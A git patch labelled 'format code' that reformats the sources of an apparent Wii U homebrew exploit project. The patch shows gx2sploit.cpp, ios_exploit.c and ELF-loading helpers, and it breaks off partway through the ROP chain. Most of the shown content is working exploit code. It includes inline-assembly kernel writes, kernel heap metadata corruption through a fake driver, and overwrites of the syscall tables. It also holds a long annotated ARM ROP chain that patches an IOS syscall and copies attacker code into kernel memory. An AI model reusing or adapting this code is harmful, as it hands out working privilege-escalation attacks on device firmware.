From 75d940884d4e9fcc74220405c7d44c770011fdae Mon Sep 17 00:00:00 2001 From: Maschell Date: Wed, 22 Jul 2020 15:12:25 +0200 Subject: [PATCH] format code --- source/ElfUtils.c | 78 ++--- source/ElfUtils.h | 8 +- source/gx2sploit.cpp | 167 +++++------ source/ios_exploit.c | 547 ++++++++++++++++++----------------- source/main.cpp | 55 ++-- source/utils/StringTools.cpp | 104 +++---- source/utils/StringTools.h | 37 ++- source/utils/logger.h | 1 + source/utils/utils.c | 24 +- source/utils/utils.h | 14 +- 10 files changed, 526 insertions(+), 509 deletions(-) diff --git a/source/ElfUtils.c b/source/ElfUtils.c index bcca683..2d6b830 100644 --- a/source/ElfUtils.c +++ b/source/ElfUtils.c @@ -12,11 +12,10 @@ #include "elf_abi.h" - -int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * sizeOut) { +int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) { char path[256]; int result = 0; - char * sdRootPath = ""; + char *sdRootPath = ""; if (!WHBMountSdCard()) { WHBLogPrintf("Failed to mount SD Card..."); result = -1; @@ -24,9 +23,9 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * s } sdRootPath = WHBGetSdCardMountPath(); - sprintf(path, "%s/%s", sdRootPath,relativefilepath); + sprintf(path, "%s/%s", sdRootPath, relativefilepath); - WHBLogPrintf("Loading file %s.",path); + WHBLogPrintf("Loading file %s.", path); *fileOut = WHBReadWholeFile(path, sizeOut); if (!(*fileOut)) { @@ -35,55 +34,56 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * s goto exit; } -exit: + exit: WHBUnmountSdCard(); return result; } + static void InstallMain(void *data_elf); -uint32_t load_loader_elf_from_sd(unsigned char* baseAddress, const char* relativePath) { - char * elf_data = NULL; +uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath) { + char *elf_data = NULL; uint32_t fileSize = 0; - if(LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) { + if (LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) { return 0; } InstallMain(elf_data); - Elf32_Ehdr* ehdr = ( Elf32_Ehdr*)elf_data; + Elf32_Ehdr *ehdr = (Elf32_Ehdr *) elf_data; uint32_t res = ehdr->e_entry; - MEMFreeToDefaultHeap((void*)elf_data); + MEMFreeToDefaultHeap((void *) elf_data); return res; } -static unsigned int get_section(unsigned char *data, const char *name, unsigned int * size, unsigned int * addr, int fail_on_not_found) { +static unsigned int get_section(unsigned char *data, const char *name, unsigned int *size, unsigned int *addr, int fail_on_not_found) { Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data; - if ( !data - || !IS_ELF (*ehdr) - || (ehdr->e_type != ET_EXEC) - || (ehdr->e_machine != EM_PPC)) { + if (!data + || !IS_ELF (*ehdr) + || (ehdr->e_type != ET_EXEC) + || (ehdr->e_machine != EM_PPC)) { OSFatal("Invalid elf file"); } Elf32_Shdr *shdr = (Elf32_Shdr *) (data + ehdr->e_shoff); int i; - for(i = 0; i < ehdr->e_shnum; i++) { - const char *section_name = ((const char*)data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name; - if(strcmp(section_name, name) == 0) { - if(addr) + for (i = 0; i < ehdr->e_shnum; i++) { + const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name; + if (strcmp(section_name, name) == 0) { + if (addr) *addr = shdr[i].sh_addr; - if(size) + if (size) *size = shdr[i].sh_size; return shdr[i].sh_offset; } } - if(fail_on_not_found) - OSFatal((char*)name); + if (fail_on_not_found) + OSFatal((char *) name); return 0; } @@ -98,11 +98,11 @@ static void InstallMain(void *data_elf) { unsigned int section_offset = get_section(data_elf, ".text", &main_text_len, &main_text_addr, 1); unsigned char *main_text = data_elf + section_offset; /* Copy main .text to memory */ - if(section_offset > 0) { + if (section_offset > 0) { WHBLogPrintf("%08X %08X %d", main_text_addr, main_text, main_text_len); - memcpy((void*)(main_text_addr), (void *)main_text, main_text_len); - DCFlushRange((void*)main_text_addr, main_text_len); - ICInvalidateRange((void*)main_text_addr, main_text_len); + memcpy((void *) (main_text_addr), (void *) main_text, main_text_len); + DCFlushRange((void *) main_text_addr, main_text_len); + ICInvalidateRange((void *) main_text_addr, main_text_len); } @@ -110,12 +110,12 @@ static void InstallMain(void *data_elf) { unsigned int main_rodata_addr = 0; unsigned int main_rodata_len = 0; section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0); - if(section_offset > 0) { + if (section_offset > 0) { unsigned char *main_rodata = data_elf + section_offset; /* Copy main rodata to memory */ - memcpy((void*)(main_rodata_addr), (void *)main_rodata, main_rodata_len); - DCFlushRange((void*)main_rodata_addr, main_rodata_len); - ICInvalidateRange((void*)main_rodata_addr, main_rodata_len); + memcpy((void *) (main_rodata_addr), (void *) main_rodata, main_rodata_len); + DCFlushRange((void *) main_rodata_addr, main_rodata_len); + ICInvalidateRange((void *) main_rodata_addr, main_rodata_len); } @@ -123,24 +123,24 @@ static void InstallMain(void *data_elf) { unsigned int main_data_addr = 0; unsigned int main_data_len = 0; section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0); - if(section_offset > 0) { + if (section_offset > 0) { unsigned char *main_data = data_elf + section_offset; /* Copy main data to memory */ - memcpy((void*)(main_data_addr), (void *)main_data, main_data_len); - DCFlushRange((void*)main_data_addr, main_data_len); - ICInvalidateRange((void*)main_data_addr, main_data_len); + memcpy((void *) (main_data_addr), (void *) main_data, main_data_len); + DCFlushRange((void *) main_data_addr, main_data_len); + ICInvalidateRange((void *) main_data_addr, main_data_len); } // get the .bss section unsigned int main_bss_addr = 0; unsigned int main_bss_len = 0; section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0); - if(section_offset > 0) { + if (section_offset > 0) { unsigned char *main_bss = data_elf + section_offset; /* Copy main data to memory */ - memcpy((void*)(main_bss_addr), (void *)main_bss, main_bss_len); - DCFlushRange((void*)main_bss_addr, main_bss_len); - ICInvalidateRange((void*)main_bss_addr, main_bss_len); + memcpy((void *) (main_bss_addr), (void *) main_bss, main_bss_len); + DCFlushRange((void *) main_bss_addr, main_bss_len); + ICInvalidateRange((void *) main_bss_addr, main_bss_len); } } diff --git a/source/ElfUtils.h b/source/ElfUtils.h index bb9de44..e55663d 100644 --- a/source/ElfUtils.h +++ b/source/ElfUtils.h @@ -1,5 +1,5 @@ #ifndef ELF_LOADING_H -#define ELF_LOADING_H +#define ELF_LOADING_H #include @@ -7,12 +7,12 @@ extern "C" { #endif -int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * sizeOut); -uint32_t load_loader_elf_from_sd(unsigned char* baseAddress, const char* relativePath); +int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut); +uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath); #ifdef __cplusplus } #endif -#endif /* ELF_LOADING_H */ +#endif /* ELF_LOADING_H */ diff --git a/source/gx2sploit.cpp b/source/gx2sploit.cpp index 6464098..1333ea8 100644 --- a/source/gx2sploit.cpp +++ b/source/gx2sploit.cpp @@ -17,21 +17,20 @@ #include "utils/utils.h" -#define JIT_ADDRESS 0x01800000 +#define JIT_ADDRESS 0x01800000 -#define KERN_HEAP 0xFF200000 -#define KERN_HEAP_PHYS 0x1B800000 +#define KERN_HEAP 0xFF200000 +#define KERN_HEAP_PHYS 0x1B800000 +#define KERN_CODE_READ 0xFFF023D4 +#define KERN_CODE_WRITE 0xFFF023F4 +#define KERN_DRVPTR 0xFFEAB530 +#define KERN_ADDRESS_TBL 0xFFEAB7A0 -#define KERN_CODE_READ 0xFFF023D4 -#define KERN_CODE_WRITE 0xFFF023F4 -#define KERN_DRVPTR 0xFFEAB530 -#define KERN_ADDRESS_TBL 0xFFEAB7A0 - -#define STARTID_OFFSET 0x08 -#define METADATA_OFFSET 0x14 -#define METADATA_SIZE 0x10 +#define STARTID_OFFSET 0x08 +#define METADATA_OFFSET 0x14 +#define METADATA_SIZE 0x10 #define BAT_SETUP_HOOK_ADDR 0xFFF1D624 #define BAT_SETUP_HOOK_ENTRY 0x00880000 @@ -63,7 +62,7 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star uint32_t *ptr; /* Search code before JIT area first */ - for (ptr = (uint32_t*)gadgets_start; ptr != (uint32_t*)JIT_ADDRESS; ptr++) { + for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) { if (!memcmp(ptr, &code[0], length)) return ptr; } @@ -75,22 +74,22 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star /* Chadderz's kernel write function */ void __attribute__((noinline)) kern_write(const void *addr, uint32_t value) { asm volatile ( - "li 3,1\n" - "li 4,0\n" - "mr 5,%1\n" - "li 6,0\n" - "li 7,0\n" - "lis 8,1\n" - "mr 9,%0\n" - "mr %1,1\n" - "li 0,0x3500\n" - "sc\n" - "nop\n" - "mr 1,%1\n" - : - : "r"(addr), "r"(value) - : "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10", - "11", "12" + "li 3,1\n" + "li 4,0\n" + "mr 5,%1\n" + "li 6,0\n" + "li 7,0\n" + "lis 8,1\n" + "mr 9,%0\n" + "mr %1,1\n" + "li 0,0x3500\n" + "sc\n" + "nop\n" + "mr 1,%1\n" + : + : "r"(addr), "r"(value) + : "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10", + "11", "12" ); } @@ -101,14 +100,14 @@ int exploitThread(int argc, char **argv) { OSDynLoad_Acquire("gx2.rpl", &gx2_handle); void (*pGX2SetSemaphore)(uint64_t *sem, int action); - OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void**)&pGX2SetSemaphore); - uint32_t set_semaphore = ((uint32_t)pGX2SetSemaphore) + 0x2C; + OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void **) &pGX2SetSemaphore); + uint32_t set_semaphore = ((uint32_t) pGX2SetSemaphore) + 0x2C; uint32_t gx2_init_attributes[9]; - uint8_t *gx2CommandBuffer = (uint8_t*)memalign(0x40, 0x400000); + uint8_t *gx2CommandBuffer = (uint8_t *) memalign(0x40, 0x400000); gx2_init_attributes[0] = 1; - gx2_init_attributes[1] = (uint32_t)gx2CommandBuffer; + gx2_init_attributes[1] = (uint32_t) gx2CommandBuffer; gx2_init_attributes[2] = 2; gx2_init_attributes[3] = 0x400000; gx2_init_attributes[4] = 7; @@ -119,20 +118,20 @@ int exploitThread(int argc, char **argv) { GX2Init(gx2_init_attributes); //don't actually know if this is necessary? so temp? (from loadiine or hbl idk) /* Allocate space for DRVHAX */ - uint32_t *drvhax = (uint32_t*) OSAllocFromSystem(0x4c, 4); + uint32_t *drvhax = (uint32_t *) OSAllocFromSystem(0x4c, 4); /* Set the kernel heap metadata entry */ - uint32_t *metadata = (uint32_t*) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE)); - metadata[0] = (uint32_t)drvhax; - metadata[1] = (uint32_t)-0x4c; - metadata[2] = (uint32_t)-1; - metadata[3] = (uint32_t)-1; + uint32_t *metadata = (uint32_t *) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE)); + metadata[0] = (uint32_t) drvhax; + metadata[1] = (uint32_t) -0x4c; + metadata[2] = (uint32_t) -1; + metadata[3] = (uint32_t) -1; /* Find stuff */ uint32_t gx2data[] = {0xfc2a0000}; uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000); uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024}; - void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t,uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14; + void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14; /* Modify a next ptr on the heap */ uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET; @@ -148,44 +147,46 @@ int exploitThread(int argc, char **argv) { /* Use DRVHAX to install the read and write syscalls */ uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE}; - DCFlushRange(syscalls, 0x04*2); + DCFlushRange(syscalls, 0x04 * 2); /* Modify its save area to point to the kernel syscall table */ - drvhax[0x44/4] = KERN_SYSCALL_TBL_1 + (0x34 * 4); + drvhax[0x44 / 4] = KERN_SYSCALL_TBL_1 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); - drvhax[0x44/4] = KERN_SYSCALL_TBL_2 + (0x34 * 4); + drvhax[0x44 / 4] = KERN_SYSCALL_TBL_2 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); - drvhax[0x44/4] = KERN_SYSCALL_TBL_3 + (0x34 * 4); + drvhax[0x44 / 4] = KERN_SYSCALL_TBL_3 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); - drvhax[0x44/4] = KERN_SYSCALL_TBL_4 + (0x34 * 4); + drvhax[0x44 / 4] = KERN_SYSCALL_TBL_4 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); - drvhax[0x44/4] = KERN_SYSCALL_TBL_5 + (0x34 * 4); + drvhax[0x44 / 4] = KERN_SYSCALL_TBL_5 + (0x34 * 4); CopyToSaveArea(drvname, 6, syscalls, 8); /* Clean up the heap and driver list so we can exit */ - kern_write((void*)(KERN_HEAP + STARTID_OFFSET), 0); - kern_write((void*)KERN_DRVPTR, drvhax[0x48/4]); + kern_write((void *) (KERN_HEAP + STARTID_OFFSET), 0); + kern_write((void *) KERN_DRVPTR, drvhax[0x48 / 4]); // Install CopyData syscall - kern_write((void*)(KERN_SYSCALL_TBL_1 + (0x25 * 4)), (uint32_t)0x1800000); - kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (uint32_t)0x1800000); - kern_write((void*)(KERN_SYSCALL_TBL_3 + (0x25 * 4)), (uint32_t)0x1800000); - kern_write((void*)(KERN_SYSCALL_TBL_4 + (0x25 * 4)), (uint32_t)0x1800000); - kern_write((void*)(KERN_SYSCALL_TBL_5 + (0x25 * 4)), (uint32_t)0x1800000); + kern_write((void *) (KERN_SYSCALL_TBL_1 + (0x25 * 4)), (uint32_t) 0x1800000); + kern_write((void *) (KERN_SYSCALL_TBL_2 + (0x25 * 4)), (uint32_t) 0x1800000); + kern_write((void *) (KERN_SYSCALL_TBL_3 + (0x25 * 4)), (uint32_t) 0x1800000); + kern_write((void *) (KERN_SYSCALL_TBL_4 + (0x25 * 4)), (uint32_t) 0x1800000); + kern_write((void *) (KERN_SYSCALL_TBL_5 + (0x25 * 4)), (uint32_t) 0x1800000); /* clean shutdown */ GX2Shutdown(); free(gx2CommandBuffer); return 0; } + void KernelWriteU32(uint32_t addr, uint32_t value); + extern "C" void SC_KernelCopyData(uint32_t dst, uint32_t src, uint32_t len); void KernelWrite(uint32_t addr, const void *data, uint32_t length) { // This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?) // further testing required. - for(int32_t i = 0; i> 16); // lis r3, setup_syscall@h - targetBuffer[9] = 0x60630000 | (((uint32_t)SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l + targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h + targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l targetBuffer[10] = 0x7c6903a6; // mtctr r3 targetBuffer[11] = 0x4e800420; // bctr DCFlushRange(targetBuffer, sizeof(targetBuffer)); - KernelWrite((uint32_t) targetAddress, (void*) targetBuffer, 0x40); + KernelWrite((uint32_t) targetAddress, (void *) targetBuffer, 0x40); /* set our setup syscall to an unused position */ - kern_write((void*)(KERN_SYSCALL_TBL_1 + (0x36 * 4)), targetAddress); - kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x36 * 4)), targetAddress); - kern_write((void*)(KERN_SYSCALL_TBL_3 + (0x36 * 4)), targetAddress); - kern_write((void*)(KERN_SYSCALL_TBL_4 + (0x36 * 4)), targetAddress); - kern_write((void*)(KERN_SYSCALL_TBL_5 + (0x36 * 4)), targetAddress); + kern_write((void *) (KERN_SYSCALL_TBL_1 + (0x36 * 4)), targetAddress); + kern_write((void *) (KERN_SYSCALL_TBL_2 + (0x36 * 4)), targetAddress); + kern_write((void *) (KERN_SYSCALL_TBL_3 + (0x36 * 4)), targetAddress); + kern_write((void *) (KERN_SYSCALL_TBL_4 + (0x36 * 4)), targetAddress); + kern_write((void *) (KERN_SYSCALL_TBL_5 + (0x36 * 4)), targetAddress); /* run our kernel code :) */ SC_0x36_SETBATS(); /* repair data */ KernelWrite(targetAddress, backupBuffer, sizeof(backupBuffer)); - DCFlushRange((void*)targetAddress, sizeof(backupBuffer)); + DCFlushRange((void *) targetAddress, sizeof(backupBuffer)); WHBLogPrintf("GX2Sploit done"); return 1; } diff --git a/source/ios_exploit.c b/source/ios_exploit.c index 7be656c..7f5e3d7 100644 --- a/source/ios_exploit.c +++ b/source/ios_exploit.c @@ -20,11 +20,12 @@ extern const uint8_t launch_image_tga[]; extern const uint32_t launch_image_tga_size; static void uhs_exploit_init(int uhs_handle); + static int uhs_write32(int uhs_handle, int arm_addr, int val); //!------Variables used in exploit------ -static int *pretend_root_hub = (int*)0xF5003ABC; -static int *ayylmao = (int*)0xF4500000; +static int *pretend_root_hub = (int *) 0xF5003ABC; +static int *ayylmao = (int *) 0xF4500000; //!------------------------------------- typedef struct __attribute__((packed)) { @@ -38,280 +39,280 @@ typedef struct __attribute__((packed)) { /* ROP CHAIN STARTS HERE (0x1015BD78) */ static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(ios_kernel_bin), // 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x00140000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 - 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) - 0x0, - 0x0, - 0x101312D0, + 0x101236f3, // 0x00 POP {R1-R7,PC} + 0x0, // 0x04 arg + 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR + 0x68, // 0x0C stacksize + 0x10101638, // 0x10 + 0x0, // 0x14 + 0x0, // 0x18 + 0x0, // 0x1C + 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x30 + 0x0, // 0x34 + IOS_CREATETHREAD, // 0x38 + 0x1, // 0x3C + 0x2, // 0x40 + 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE92D4010, // 0x4C value: PUSH {R4,LR} + 0x0, // 0x50 + 0x10123a8b, // 0x54 POP {R3,R4,PC} + 0x1, // 0x58 R3 must be 1 for the arbitrary write + 0x0, // 0x5C + 0x1010CD18, // 0x60 MOV R12, R0; 